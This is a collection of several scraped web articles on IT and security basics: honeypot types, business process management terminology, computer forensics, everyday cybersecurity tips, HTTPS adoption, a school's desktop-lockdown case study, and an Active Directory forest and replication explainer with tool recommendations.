In order to successfully execute a honeypot in network security, it is imperative that the entire system set-up seems like legitimate. There has to be certain dummy files in it to make it look important from the surface. The system security designers usually keep it just behind the corporate firewall. A honeypot is programmed to block the outgoing traffic, so that the hackers cannot use it as a checkpoint to redirect toward other internal assets.
In terms of functioning purpose, honeypots are classified into two types- research honeypots and production honeypots.
- Research honeypots are basically assigned to accumulate info on attacks and examine the malicious behaviour for the future pre-emptive measures.
- On the other hand, production honeypots primarily recognize the compromise on internal network security and subsequently tricking the invader.
As the job role indicates, research honeypots are more complex and carry additional forms of data files in comparison to production honeypots.
- Pure Honeypot: A full-scale production replication system that can run on different servers. It has comprehensive sensors and carry dummy “confidential” data and user details.
- High-Interaction Honeypot: It is used by the security analyst to observe attacker’s techniques and behaviour pattern. These types of honeypot are quite resource-intensive and demand more maintenance, but can deliver worthwhile findings.
- Mid-Interaction Honeypot: They do not possess own operating system, and primarily used to confuse the attackers in order to buy some time for the security team to react to the breach.
- Low-Interaction Honeypot: This form of honeypot in network security is widely deployed while creating a production environment. It is used for advanced warning spotting mechanism. They are quite simple to deploy and maintain.
Types of Honeypot Technologies
Some of the key honeypot technologies are as follow-
- Malware Honeypots: It is known to replicate and use attack vectors to identify malware. One example is Ghost USB honeypot meant to safeguard the machine from malware spread through USB.
- Spam Honeypots: It is used to simulate open proxies and mail relays. It detect and block the large quantity of spam emails dispatched by the spammers.
- Database Honeypots: It helps in creating decoy databases. These types of honeypots are effective against activities like SQL injections that frequently go untraced by the firewalls.
- Client Honeypots: It is helpful in tracing out malicious servers that are primarily responsible for attacking clients. It functions over virtualization technology and implement a containment strategy in order to curtail the risk imposed on the research team.
- Honeynets: It is a single system comprising of multiple honeypots in the network security. The purpose of the honeynets is to tactically track down the motives and methods of the attacker, simultaneously containing all sorts of outbound and inbound traffic.
The Benefits of Honeypot in Network Security
The following are some of the major benefits of a honeypot-
- Ability to break/ slow attackers down: The attackers while scanning your network always seek misconfiguration and vulnerable devices. An encounter with the honeypot renders you the chance to investigate and restrain the attack on time.
- Unambiguous in Approach: Honeypot does provide you with precise alert and location of the breach. It does help you out with identifying the loopholes as well as the invasion threat without scanning unnecessary locations and wasting the time.
- Easy to Install and demand low-maintenance: Modern honeypots are easy to download and install. They also require low-maintenance time and cost.
The presence of a strategically prepared honeypot in network system can enhance the level of security to a significant level. It is an undeniable fact that you cannot entirely depend on honeypots to formulate your threat detection strategy, but it delivers another layer of trusted security.
So the next time you devise a strategy to integrate honeypots to your network security systems, evaluate the types as mentioned above as per your need and incorporate a powerful weapon to your arsenal of ethical deception technology. | <urn:uuid:c1ef5f89-71c1-46d2-bcd4-cb331b9a808d> | CC-MAIN-2022-40 | https://ipwithease.com/understanding-types-and-benefits-of-honeypot-in-network-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00562.warc.gz | en | 0.932032 | 1,070 | 3.03125 | 3 |
Sometimes we tend to confuse managing business processes with business process management, the latter known universally by BPM. While the first is an activity that supports the smooth execution of processes, their control, including its improvement, the second (BPM), is conceived as a comprehensive discipline that defines a model of how companies should organize to achieve their strategic business objectives. I say a model, to emphasize that there are other models different to BPM, such as the orientation of the organization of the company’s functions – i.e. departments (Does this mean that departments make less sense in an organization aimed at BPM? This doubt I leave open to discuss in future articles.)
Managing business processes (or MBP) comprises of all those management activities aimed at the proper execution of each process of the company, that is, monitoring, provision of resources and sufficient means, its improvement so that subsequent executions of the same process are more efficient, resolution of incidents and problems associated with the process execution, the reengineering of a process (one-shot project on time) etc. Any task that focused on the process to run as best as possible, we could frame as ‘managing business processes’.
Business process management or BPM is a discipline / framework upon which a company organizes, operates, produces, derives income and so on, i.e. it operates in the company over a lifetime (Enterprise Architecture). BPM determines clearly that the fundamental object for the operation of the company is the business process (whether this is indeed so or not is the orientation of BPM, and it is possible that many business experts do not think the same), and about this concept (the process) one should organize the company. BPM has a clear objective, to promote and facilitate continuous improvement (continuous projects). Having a business process view is easier to identify and makes the improvements that enhance the activity of the company, according to BPM.
As a result, BPM is not in opposition to managing business processes and vice versa, but the second is an activity or set of activities necessary but not sufficient for BPM. It completes BPM, but does not fully define it. We are talking on different scopes, both within BPM, a global company and other specific business processes.
Some examples of scope of different concepts depending on whether you are contextualized in BPM or Managing Business Process:
|Organization||Leadership and participant roles in company management and processes. Organization of company.||Responsible and participants roles identification in processes. Organization in processes.|
|Processes||Characterization and relationship processes. (Horizontal vs. Vertical). Process Architecture.||Processes inventory.|
|Improve||Continuous||Spot. Concrete actions for improvement in a process.|
|Architecture||Business and Processes Architecture. Common threads.||Technical Architecture with services orchestation of activities.|
In my opinion, when we want to refer to managing business processes, it would be more appropriate to speak about process improvement or BPI instead of BPM, and leave this last concept to discuss about a framework for Enterprise Architecture. | <urn:uuid:d4838fdb-44f1-4483-bea9-137244ddf14a> | CC-MAIN-2022-40 | https://www.bpmleader.com/2012/03/05/it%E2%80%99s-not-the-same-managing-business-process-mbp-and-business-process-management-bpm/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00562.warc.gz | en | 0.940867 | 651 | 2.59375 | 3 |
Forensic analysis has long been an important tool in policing. From the analysis of gunshot trajectories to the DNA testing of materials at crime scenes, forensics play an increasingly important part in gathering the evidence needed to solve crimes. But with the rise of the computer age, e-crime has become a growing problem throughout the world and with it a new form of forensics has been developed.
E-crime refers to any criminal offence where a computer or other electronic device is used to help commit the crime. A large proportion of e-crime involves the internet. Such crimes include: distributing or downloading extreme hardcore pornography; hate crimes, such as sites designed to incite racial hatred; and ‘hacking’ attempts, where a person attempts to access another person’s computer without permission.
Often, people think that deleting a file, saving over it or even ‘wiping’ the hard drive will remove all traces of evidence from their computer. But increasingly, police are turning to computer forensics experts to help recover this supposedly erased evidence.
Computer forensics involves the analysis of computers (and Mobile Phone Forensics is obviously the analysis of mobile phones) in order to produce legal evidence of a crime or unauthorised action. The sort of evidence extracted from a computer might include earlier versions of files, deleted data or websites visited online. Once extracted, this evidence can be used in a variety of ways, including being presented at employment tribunals to lend weight to action against an employee, or to provide information about the source of a breach in a firm’s internet security.
Computer forensic analysis can also reveal vital clues that can help police solve cases. In 2008, computer forensic analysts helped lead the police to two men who were robbing people at gun point after they responded to motorcycle adverts. The analysis revealed that one computer had been used to place dozens of ads on the listing site Craigslist. The analysts were then able to direct the police to the suspects’ home where they were arrested. This is just one example of how computer forensics has become a vital tool in the fight against crime.
Computer forensic evidence is also often used in a court of law as proof in support of, or against, an accusation of guilt regarding crimes such as fraud, breach of data protection or even murder, where a computer might have been used to carry out research about the crime. In such cases, a computer expert witness would be called to testify as to what evidence had been revealed as a result of the analysis. Such evidence can make or break a case. In the trial of Mohammed Atif Siddique, a Scottish man who was accused of collecting and distributing terrorist related information, computer forensic analysis of his laptop and mobile phone provided vital evidence in securing his eventual conviction.
As more and more people rely on computers, mobile phones and the internet to collect and distribute information, it seems that computer forensics will become an increasingly crucial tool in the fight against crime. | <urn:uuid:6506b56b-f6b1-44ec-b9c9-bf42667d6256> | CC-MAIN-2022-40 | https://www.intaforensics.com/2010/10/15/computer-forensics-as-a-growing-tool-in-the-arsenal-of-policing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00562.warc.gz | en | 0.96509 | 600 | 3.171875 | 3 |
CyberSecurity is, without a doubt, a fascinating field, but the truth of the matter is, that there are few who even bother to put into practice what most consider common-sense advice.
All over the world, people complain about hijacked email accounts, unauthorized purchases, laggy computers, and, suspicious software popping out of the blue.
Granted, it’s unfortunate, but have we really taken all the measures necessary to ensure that our private data remains private? The answer to that question is a big no – the online world is littered with all kinds of dangers, and installing an antivirus just won’t cut it.
So, for your devices to be up-to-speed, security-wise, we have compiled a small list of the very best cybersecurity practices. Enjoy and stay safe out there!
Sensitive browsing should be done from controlled environments
By sensitive browsing, we’re, of course, referring to activities that involved monetary transactions of any kind (shopping, accessing bank account via a specialized app, trading stocks, bidding).
It boasts the same features as a regular browser. However, Safepay and similar products have extra encryption protocols that prevent hackers from stealing your information.
Another solid piece of advice would be to use a secured broadband connection or Wi-Fi.
This, of course, excludes sensitive browsing from locations such as coffee stores or shopping malls which offer free Internet service. It would also be a good idea to avoid using a friend’s Wi-Fi. You never know who might be listening.
Passwords should contain more than eight characters
Every sign-up page on the Internet advises users to create a strong character. The ‘industry standard’ would be a password of eight characters.
Of course, you are free to use only letters and numbers, but for extra safety, you should use both. To make the password stronger, you may also employ upper- and lower-case letters. In our opinion, a good pass should contain all four elements and have at least 12 characters.
Don’t use the same password for every account. You should create a new one for each page. If you didn’t remember all of them, the best thing to do would be to use a password vault such as LastPass.
This software will remember all your passwords, which will be kept in the vault.
Users will be asked to generate a Master Password to protect their passes. Software such as LastPass also comes with useful features such as auto-fill, two-factor authentication via Sesame or YubiKey, fingerprint ID, and desktop support. One last thing – don’t use names, surnames, pet’s names, date of births, or anything of the kind as passwords. They’re very easy to break.
If you are not into cloud password managers you should try KeePass. This open source tool is compatible with the most operating systems (both desktop and mobile) and keeps the database and key locally. I suggest you use a removable USB stick for the key and database (preferably kept in different places)
Lock your device and never leave them unattended
Yes, we are aware of the fact that this might seem like a no-brainer, but many people leave their phones or tablets unlocked while at the office or when going to a café.
Of course, the best thing to do would be to keep the device on you at all times. Still, if that’s not possible, don’t forget to lock it before going away. Moreover, you shouldn’t leave the device unattended for long periods.
Always verify credentials when you’re asked to share sensitive information
This is perhaps the oldest and dirtiest trick in the book – posing as a company representative and asking the victim to disclose sensitive information.
In our practice, this is called “shooting the middle man.” Now, the next time someone is calling, emailing, or messaging you about some company-ordered survey, don’t be too hasty about sharing information.
Instead, ask him or her what’s this about and try to get as many details as possible: name, position, and company. Remember that it’s your right to refuse to disclose personal information.
If you have these details, you can try getting in touch with the company to see if this was legit or not. Keep in mind that online service providers will never ask you to reveal your account details.
Perform a thorough scan of flash drives before accessing them
Although cloud’s the fastest way to go when it comes to sharing information, people still use flash drives and optical storage. If you need to retrieve info from a memory stick or card, it’s better you run a malware and antivirus scan before accessing the device.
It doesn’t matter that the stick or card has been given to you by a friend or family member.
They may have become infected without the person’s knowledge. Most antivirus software can automatically scan flash drives or cards when the user connects one to the device.
However, you can also perform an on-demand scan if your antivirus doesn’t come with this feature.
Hackers don’t discriminate targets
The worst mistake that you can ever make is to think that you’re far too unimportant to be targeted by hackers. The truth of the matter is that they really don’t care if you’re a regular Joe or a big pharma company – if you have money in your bank account, you automatically become a target.
Stealing your personal info to access and withdraw money from the account is one way to go, but not the only one. Malware such as WannaCry Ransomware encrypt your device with an uncrackable password and to only way to retrieve your info is to pay the requested sum.
Fake friend requests can put your information at risk
Facebook and other social media platforms are great for meeting new people, getting in touch with old friends, or to share amazing videos. Remember, though that you shouldn’t take everything at face value.
A spontaneous friend request may be the beginning of a great friendship or even a budding relationship, but it may also an attempt to coax you into disclosing sensitive info.
Fake accounts have been used to trick users into sharing stuff like addresses, social security numbers, and even banking details. So, the best approach would be to delete the friend request if you don’t know the person in real life.
On the other hand, there’s a chance that the account may be legit and by deleting it, you might have missed out something great. If you don’t want to block that person, look at his feed.
Fake accounts will have little to no content and, most of it would be generic. Furthermore, if the person attempts to contact you, keep the conversation on a how’s-the-weather-like level; don’t disclose any personal details that may put you at risk.
2-FA all the way!
Sometimes it’s hard to switch between multiple accounts, especially if one or more is protected by two-factor authentication.
However, it’s considered to be one of the most secure methods available to consumers. There are plenty of ways to go about securing your account with 2-FA: some sites ask you to reply to a text message on your phone, others have clickable popups.
Although most sites have in-built 2-FA solutions, we would recommend downloading a third-party mobile app such as Authy, LastPass’s proprietary authenticator, Duo Mobile, or Microsoft Authenticator instead of relying on a single extension.
In a bid to make 2-FA easier and faster, Google has launched the Titan Key; a physical device that acts just like a third-party authenticator.
Each time there’s a sign-in attempt, the blue button on the key would flash blue. To confirm your identity, tap the button, and you’re good to go.
Though it sounds like a dream come true, you should take Google’s gadget with a grain of salt, as there have been reports of firmware errors that may put your Gmail account at risk. Still, it’s an alternative worth exploring.
Back up your data and ensure that your antivirus is up to speed
Always have another copy of your data in case something goes wrong. If you keep work on a physical drive, you might consider backing up to the cloud. You should do the same thing if you prefer cloud over local storage solutions.
On that note, you should also ensure that your antivirus’ database is up to date. This also includes the anti-malware feature.
Though many antivirus software automatically downloads and install database updates once they become available, some may call for intervention. So, back up your data and regularly check your antivirus database. You should do the same for all devices.
Not every link is safe
You may have noticed by now that your Gmail’s spam section is filled to the brim with all types of suspicious emails. The filter does its job above and beyond the call of duty, but some spammy emails may slip unnoticed.
If you find something in your mailbox that comes from an unknown source (i.e., promotional emails from retailers you’ve never interacted with), you should avoid clicking them.
In most cases, they’ll lead to pages advertising useless products, but they can also lead to places that download and install spyware and malware in the background.
The same thing should be done when you encounter flashy links on websites or big “Download” buttons.
Doing a little bit of spring cleaning
Most computer users are hoarders when it comes to old applications. On a daily basis, we don’t use more than a handful of apps – Office, browser, desktop music or video streaming, perhaps a game or two, and a video player.
That’s it – the rest is junk and should be treated like such. So, if you have apps on your PC, tablet, or smartphone that haven’t been used in six months, do yourself a world of good and uninstall them. Apart from gaining some much-needed space, you will also eliminate possible vulnerabilities which hackers can use to access your device.
Check the link when accessing a new website
The best way to ensure that the data shared on a website stay there is to access pages that encode Hypertext Transfer Protocol Secure (https). This will ensure that no one can hack your information in transit in order to spy on your online activities.
Refrain from installing or running PUPs (potentially unwanted applications or programs)
Each time an application is installed on your computer, Windows Notification Center will display a popup asking if you want to run that installation package. In some cases, WNC will say that the program you’re about to run or install is an unwanted app that may put your device at risk.
You should pay more attention to this system message, although we are aware of the fact that most users dismiss them with even bother reading them.
Keep in mind that the apps you’re about to install and run may not have been compromised. However, since it’s flagged as unwanted, it means that, in time, it can become a gateway to malware and spyware.
So, if it’s not an app crucial to your work or pastime activities, you should refrain from installing it. Gamers, be warned!
Avoid clicking on random ads
Sometimes, hitting an ad that pops up on your screen is inevitable. Mind you that they have engineered to be, well, clickable. Most are legit and will probably redirect you to some online stores.
Yes, it is annoying, but bear in mind that some online service providers out there use ad push to keep the website operational. Now, in some instances, clicking an ad might lead to a makeshift page that doesn’t offer anything substantial – except for malicious code that’s injected into your device.
So, avoid flashy ads, and ensure that your antivirus’ unwanted website tool is up and running. You can also download an ad blocker if you want to get rid of all the on-screen apps. Keep in mind that some sites won’t allow you to surf if they detect ad-blocking software on your computer.
As you can see, most of these security tips are based on common-sense; nothing too pretentious or complicated. What do you think about these cybersecurity tips and tools? Head to the comments section and let us know. | <urn:uuid:a75e5db6-11cd-4469-9a8f-8df2e214ff71> | CC-MAIN-2022-40 | https://cybersecuritymag.com/online-security-tips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00562.warc.gz | en | 0.93338 | 2,644 | 2.578125 | 3 |
We recently updated our redirections rule in HTTPS-Everywhere, a browser extension that automatically redirects you to the HTTPS version of the website you are trying to visit. Now is a good time for us to give a short overview of how important HTTPS is. We'll also talk about a few major HTTPS-related events that happened lately.
When we browse the web, several third-parties are able to snoop on the connection between the user and the website, including the user's ISP, law enforcement, the website's ISP, and other people in between.
These intermediaries are able to obtain and modify on the fly most of the information sent through the connection: the website reached, the web page name and content, the potential username and password, the user's IP address, and more. It obviously poses a lot of problems, which is why HTTPS is now mandatory for more and more websites (public sector, banks, etc.). Using HTTP with SSL/TLS (HTTPS) hides much of information compared to the picture above:
Now, the intermediaries only get access to the website reached and the user's IP address. The web page name, its content, the logins are no longer exposed to whoever snoops between the user and the website. It's also no longer possible to modify this data on the fly.
The security gain is then huge, as it's possible to transmit sensitive data in an authenticated way without being modified. This is possible thanks to a chain of trust established between the user software (a web browser, for instance) and a third-party who authenticated the service (a website, for instance).
This third party is called a Certificate Authority (CA). There currently are a lot of different CAs and all of them need to strictly follow the guidelines in order to stay trusted by web browsers, operating systems, and other software.
Once a service requests a certificate to be authenticated, the Certification Authority proceeds to a multiple-step process in order to verify the owner identity. If it's successful, the service will be authenticated.
A widespread adoptionHowever, despite the huge benefit of using SSL/TLS, anyone who requests a trusted certificate for a specific domain needs to regularly pay an expensive fee, which slows down the adoption rate.
In 2014, a new non-profit Certificate Authority was created by the ISRG with the idea to provide trusted certificates for free for everyone. The adoption was huge: Let's Encrypt has been publicly launched in 2016 and has already delivered more than 33M certificate since then, for more than 40M domains.
For the first time, more than 50% of total web page requests have been served over HTTPS in early 2017 and it's still climbing.
This widespread adoption is definitely good news for security. However, the landscape evolves very quickly, with involved parties trying to fix the remaining problems—and introduce new ones.
Web browsers pushing harderIn order to push the adoption much further, web browsers are also taking active actions.
Recently, Google and Mozilla announced a new feature in their browsers (Chrome and Firefox, respectively): websites served over HTTP will be labeled as non-secure (whereas before HTTP websites used to be the norm and only websites served over HTTPS had a specific label):
Another step is the introduction of Certificate Transparency, the support of which will be mandatory for all Certificate Authorities from October 2017 in order to very quickly detect wrongly issued certificates and malicious Authorities, thus, revoking them as quickly as possible.
Last but not least, they are taking strong positions against Certificate Authorities that don't follow the rules and best practices: Google and Mozilla announced their intention to distrust the “Class 3 Public Primary CA” Symantec certificate due to several failures to comply with the industry rules and other more recent security problems. This will revoke the trusted chain and will trigger a warning for users visiting a service authenticated with this certificate and may even block them to visit the website depending on their configuration unless Symantec changes their practices or agree to comply with Google and Mozilla requests which may be the case.
Security software playing nasty
- On 12 famous and widely used corporate middleboxes tested: | <urn:uuid:28a38035-f2a3-45dd-920f-21005ae6694b> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2017/06/https-everywhere | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00762.warc.gz | en | 0.954708 | 848 | 3.09375 | 3 |
The first school in what is now Garden City was a log cabin built sometime between 1840 and 1845. Today, the Garden City School district has approximately 600 staff and 5,500 students using 1,300 workstations. Half of the workstations are running a Windows environment, while the other half are Macintosh computers. The school district was experiencing problems with students getting into and changing the proxy settings in Internet Explorer. Students were also changing other settings and using Windows Networking to get into other machines in the building that were not secure.
The IT staff at Garden City were already using Deep Freeze to protect their systems. They now deployed WINSelect to restrict the functionality on their systems. Garden City currently has WINSelect installed on almost 100 computers in the district. The IT staff has configured the program to control their web browsers and to control where students can save files. WINSelect also lets administrators disable the right-click mouse option to prevent students from accessing restricted places on the system. | <urn:uuid:33841a81-f1a1-4613-90d5-a1910ab5774d> | CC-MAIN-2022-40 | https://www.faronics.com/document-library/document/faronics-winselect-and-garden-city-public-schools | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00762.warc.gz | en | 0.972658 | 197 | 2.625 | 3 |
If you’re an IT admin responsible for managing your organization’s critical assets in an enterprise network, Active Directory (AD) should be your number one tool. Whether you’re running a small network or a large one, managing a slew of assets, users, and permissions can be a tedious ordeal. AD facilitates and streamlines this process. A Microsoft software used to manage computers and other hardware on an organization’s network, Active Directory enables IT teams to organize users into logical groups and subgroups, and to allocate access control for each group with ease.
When properly monitored and managed, Active Directory is an invaluable tool for network administrators, especially as an organization grows larger and begins adding more users and resources to their networks. It’s also enormously helpful in demonstrating industry compliance. In this article, I’ll offer an overview of the important concepts IT teams need to know about Active Directory, then a review of the best tools to keep your AD networks organized. These all have free trials, so I recommend giving them a shot—especially my top picks: SolarWinds® Access Rights Manager and SolarWinds Server & Application Monitor.
Feel free to jump ahead or continue reading:
What Is Active Directory Forest?
Microsoft designed Active Directory to store and manage information about objects and users on a network. In a way, it can be thought of as a telephone directory for network resources—when an IT team wants to access information about a computer, server, hardware resource, shared file or folder, or group of users, they look it up in AD.
IT teams use Active Directory to arrange, manage, and control network access and permissions, as well as to arrange network objects into logical, hierarchical groups, so admins and managers can better oversee and control their assets. Active Directory is also used to authenticate and authorize users, so only privileged users can obtain access to an organization’s most sensitive data and resources.
Understanding Active Directory Structure
Active Directory is a database management system. To organize its data, it uses a hierarchical structure made up of objects, domains, trees, and forests. Understanding these components of Active Directory structure is vital to effective AD management and monitoring.
In Active Directory, objects can best be understood as physical network entities—AD objects include computers, servers, hardware resources, shared files and folders, and even end users. To make these entities more easily identifiable, Active Directory will assign unique attributes to an object. For example, Active Directory will define a user by name, location, and department. With the added granularity of these attributes, IT teams are better equipped to track and manage important network objects. They can even create AD groups based on certain attributes to better manage a company’s resources or employees.
An Active Directory object can be categorized as either a container object or a leaf object:
- Container objects: Container objects can contain other objects. Examples of a container include folders and printers.
- Leaf objects: Leaf objects, on the other hand, only account for themselves. Examples include users and single files.
Beyond these categories, certain objects are designated as security principal objects, which can be assigned permissions or special authentication rules. IT teams use a unique SID (security identifier) to identify each security principal.
In Active Directory terms, a domain is an area of a network organized by a single authentication database. In other words, an Active Directory domain is essentially a logical grouping of objects on a network. Domains are created so IT teams can establish administrative boundaries between different network entities. There’s no limit to the number of objects you can add into an AD domain, and objects don’t need to be in the same physical location to be grouped together.
Active Directory domains are controlled by a tool called the domain controller. The domain controller acts as a domain authority, meaning it’s responsible for all Active Directory object permissions, authentications, modifications, and edits in a domain. AD domains are usually identified via a domain name system (DNS). Usually the DNS is the same as a company’s public domain name, although sometimes there are alternate subdomain names.
One of your first considerations when setting up AD will be whether to use a single domain vs. multiple domain Active Directory structure. It’s always advisable to use only the minimum number of domains necessary for your organizational needs. The simplest option is to limit the structure to a single domain, but this isn’t typically possible at the enterprise level.
In large networks, there might be dozens or even hundreds of Active Directory domains. To organize them in a manageable way, domains are put together into groups called Active Directory domain trees.
AD Forest vs. Domain
Enterprise networks with hundreds of users and thousands of network entities might have dozens and dozens of Active Directory trees. In such cases, IT teams will organize AD trees into groups called forests. Active Directory forests are the highest level of security boundary for network objects in the Active Directory tree and forest structure.
Within this Active Directory hierarchy, an AD forest is considered the most important logical container in an Active Directory configuration. This is because it contains all other users, domains, computers, group policies, and any other network objects of importance.
Single vs. Multiple Active Directory Forest
Although Active Directory may contain multiple domains and trees, most single Active Directory configurations only house a single domain forest. However, in certain situations, it can be advantageous to create multiple Active Directory forests due to a given network’s autonomy or isolation requirements.
In multiple forest ecosystems, information and data exchange can only occur within the confines of a single Active Directory forest. This can be a challenge to manage, so IT admins should know creating more than one forest can make Active Directory monitoring practices significantly more complex.
Generally speaking, it’s considered best practice to run only a single Active Directory forest, but if you need an added layer of security between your Active Directory domains, it’s wise to leverage a multi-forest ecosystem. However, this isn’t an automatic security fix—IT teams still need to manage and enforce permissions for every created Active Directory forest.
Additionally, IT pros might find multiple forests helpful if they’re installing Active Directory management software. With an additional forest, IT teams can leverage an isolated copy of their AD system to test and tweak the configuration of their new software before rolling it out on a live network, minimizing the risk of the software affecting day-to-day operations.
What’s more, multiple forests can be helpful in the case of large company mergers and acquisitions, especially when a company buys another business already using Active Directory on its network. Depending on the nature of the transaction, it can sometimes be easier to create an entirely new forest for the newly bought business, as opposed to migrating every user and resource over into your existing domains and trees.
If the acquired organization plans on operating under its current name even after the acquisition, chances are it won’t want to switch its domain name either. This means it can’t be integrated into your company’s existing domains and trees due to complications with the DNS. In such circumstances, an IT team can attempt to port the trees of the new division over to the existing forest, but this can quickly become complex.
Instead, leave the acquired network alone, and link the two Active Directory forests together by establishing a transitive trust authority. Although this solution has to be carried out manually, it can be effective. A transitive trust authority will extend the accessibility of resources, so the two forests can effectively merge on a logical level. This saves time and IT resources, which will likely already be stretched thin during a merger. IT teams can still manage the two Active Directory forests separately and let the trust link handle any mutual accessibility.
Understanding Active Directory Replication
To understand Active Directory replication, it’s first important to look at how Windows NT environments operated before AD. Windows NT environments were built as single master networks, meaning they used a single primary domain controller. This domain controller was the sole authority responsible for managing the domain’s database.
With this setup, the primary domain controller was responsible for replicating any and all changes made to the backup domain controllers. If the primary domain controller was unavailable or experiencing downtime for some reason, no changes would be made to the domain database, which meant data was at risk of being lost or unaccounted for. This made Windows environments significantly less reliable, since IT teams had to take many manual steps to continually ensure changes could be made to a domain database or else risk losing valuable information.
To mitigate these risks, IT teams needed a software to deploy more than one domain controller. If you were to deploy multiple domain controllers on a single network environment, performance would improve, since the network’s processing load would be spread to all domain controllers instead of a single primary domain controller.
The solution came with the introduction of Active Directory, which, unlike Windows NT environments, was designed to be a scalable, distributed, replicated database. This means AD operates with multiple domain controllers. Because every domain controller in an Active Directory ecosystem automatically creates a replica of the information it stores within its own domain, the entire AD system is more reliable than previous systems.
Accordingly, Active Directory replication is best understood as a guarantee that any information or data processed by any of the domain controllers is consistent, updated, and synchronized. Any changes made to a replica on one domain controller will automatically be transferred to replicas on an organization’s other domain controllers. This replication process enables IT admins to modify any Active Directory database from any domain controller, and to have these changes be automatically replicated to all other domain controllers in the same domain or tree.
The question then becomes, what information is replicated in Active Directory? Some actions in AD are replication triggers, meaning when they occur, replication automatically happens. For example, when an object is created, deleted, moved, or changed, it will be replicated.
The Benefits of Active Directory Replication
Replicated domain controllers have many security benefits. Crucially, if one domain controller becomes damaged or goes down, the IT team can more easily replace all the original records it stored by copying its database to another site.
What’s more, if a threat actor breaches valuable credentials from users on your organization’s network, they may try to change the permissions held in the local domain controller to exfiltrate higher privileges. If higher privileged credentials are compromised, your network’s sensitive data is significantly more at risk, since these users tend to have access to the most sensitive data. With replication, those changes can more easily be mitigated or dealt with once they’re spotted.
Additionally, having access to an ongoing comparison of an organization’s domain controller databases offers IT teams valuable security monitoring capabilities. Active Directory replication can also help your IT team eliminate a compromised account from your network altogether.
On the flipside, if you want to restore an original database and roll out updated records, it’s essential to run regularly scheduled system sweeps and integrity checks.
To get the most out of your replication, you need to implement good management policies for the network managers tasked with operating Active Directory. The increase in local domain controllers opens the door to security threats, creating more opportunities for bad actors to steal or alter data before being detected and locked out; security protocols should always be followed to avoid these risks.
Coordinating copies between domain controllers can quickly become complicated and time consuming, thus making it difficult to carry out Active Directory monitoring manually. It’s important to invest in automated tools to ensure your domain controllers and their replicas are all monitored.
Active Directory Replication Topologies
Replication traffic travels between domain controllers through a route known as the replication topology. There are four fundamental replication topologies. When deciding which to implement, you’ll want to consider the physical connectivity of your network.
- Ring Topology: In ring topologies, every domain controller has two outbound and two inbound replication partners. With this configuration, there are never more than three hops between domain controllers on a single site.
- Hub and Spoke Topology: The hub and spoke topology is defined by the existence of one or more hub sites using slow wireless area network (WAN) connections to connect to spoke sites, while the hub sites connect to each other with fast WAN connections. This topology is most commonly implemented in enterprise environments where scalability is paramount, and redundancy isn’t as highly valued.
- Full Mesh Topology: Full mesh topology is typically used in smaller organizations where redundancy is of the utmost importance and site availability is limited. However, this topology is costly and not easy to scale.
- Hybrid Topology: A hybrid topology can be a combination of any of the topologies outlined above.
Best Tools for Managing Active Directory
Managing your Active Directory authentication system can be an incredibly difficult process, especially when you’re dealing with large numbers of domains, trees, and forests. It’s easy to become overwhelmed if you attempt to do this manually, without the assistance of special, automated tools.
There are so many Active Directory tools on the market, it can be hard to choose the best one for your needs. I’ve tested many of the most popular solutions out there and assessed their strengths and weaknesses to narrow down the field. Below are my top picks for the best Active Directory management solutions.
The best Active Directory tool on the market is without a doubt SolarWinds Access Rights Manager. IT teams can install ARM on any version of Windows Server and immediately begin managing access rights across an IT infrastructure.
ARM has several automated tools to make access rights management easy. For one, it includes custom-delivered Active Directory reporting, enabling IT admins to generate ad hoc reports to see which users have access to what on their networks. The reports can go into detail to show when a user accessed a file or folder on the network.
In addition to helping IT teams analyze and monitor user access, the ARM Active Directory reporting tool can be leveraged to generate preconfigured compliance materials for a myriad of industry formats—including GDPR, PCI, and HIPAA. These reports can be automated and scheduled ahead of time.
Additionally, IT teams can use ARM to protect their organizations against data loss and potential security breaches with the help of automated monitoring. When ARM is installed in your infrastructure, it will get right to identifying user accounts with insecure configurations that might signal credential theft or authorization misuse. And with ARM’s ability to provide IT admins with a full audit trail of all permissions and access-level changes, cybersecurity investigations can be completed in a matter of minutes.
Finally, ARM enables IT teams to automate the entire Active Directory user provisioning process with the aid of role-specific templates. These templates ensure users conform to security policies by commissioning access privileges via the principle of least privilege.
Server & Application Monitor is another excellent tool from the team at SolarWinds. In addition to being a full-stack server monitoring software, SAM operates as a tool for Active Directory management. Users can easily monitor and troubleshoot any Active Directory performance issues with a myriad of automated features.
With SAM, users can leverage the Replication Summary view to make sure all replications between domain controllers are successful. This allows IT teams to quickly identify replication status and drill down into the domain controller replication process. With a full cart of metrics, IT teams can glean insights into the progress and success of different configurations, AD schemas, and more.
In addition, SAM includes a Domain Controller Details widget, so IT teams can review domain controller roles and make changes as needed. This tool provides a holistic view into the status and role of each domain controller on your network. IT admins can even view, search, and sort all seven Flexible Single Master Operations roles—from the domain name and schema master to the domain controller emulator and the infrastructure manager.
Beyond these features, SAM offers a resource for IT teams to view all Active Directory site details in real time. The Site Details tool allows users to drill down into each site, which means IT admins can obtain and leverage helpful information—from site link name to subnets and IP ranges—to quickly identify and solve any remote location Active Directory issues.
PRTG Network Monitor by Paessler operates as a bundle of tools, which it refers to as sensors. Some of these are Active Directory sensors, which can be used to monitor your AD systems. If you only activate 100 sensors, you can use PRTG for free. If you exceed 100 sensors, payment depends on how big your network is and how many sensors you choose to activate.
The PRTG Active Directory sensors can be used by IT teams to monitor their AD replication system. When used properly, they ensure the database is copied to all domain controllers on the network. Additionally, the tool’s Active Directory Replication Errors Sensor is designed to monitor different parameters during a directory’s replication period, to help ensure your domain controllers are synchronized and in line with one another. In the case of an anomaly or an error, an alarm will be sent to an IT admin.
What’s more, this solution can log employees’ network activity, which can offer network admins insights into suspicious behavior or internal threats and is helpful in managing issues associated with logged-out or deactivated users.
